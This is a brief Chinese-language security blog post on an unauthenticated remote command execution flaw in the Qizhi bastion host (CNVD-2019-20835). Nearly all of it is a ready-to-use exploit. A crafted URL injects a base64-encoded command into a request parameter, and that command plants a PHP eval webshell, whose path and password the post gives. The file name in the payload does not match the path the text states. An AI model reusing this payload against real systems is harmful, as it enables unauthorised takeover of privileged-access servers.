1. 极安网首页
  2. 网络安全技术

齐治堡垒机前台远程命令执行漏洞(CNVD-2019-20835)

齐治堡垒机前台远程命令执行漏洞(CNVD-2019-20835)-极安网

未授权无需登录。

1、访问 https://www.secvery.com/listener/cluster_manage.php :返回 "OK".

2、访问如下链接即可getshell,执行成功后,生成PHP一句话马

3、/var/www/shterm/resources/qrcode/secvery.php 密码secvery

  1. https://www.secvery.com/ha_request.php?action=install&ipaddr=10.20.10.11&node_id=1${IFS}|`echo${IFS}" ZWNobyAnPD9waHAgQGV2YWwoJF9SRVFVRVNUWzEwMDg2XSk7Pz4nPj4vdmFyL3d3dy9zaHRlcm0vcmVzb3VyY2VzL3FyY29kZS9sYmo3Ny5waHAK"|base64${IFS}- d|bash`|${IFS}|echo${IFS}

原创文章,作者: Admin ,转载请注明出处:https://secvery.com/1893.html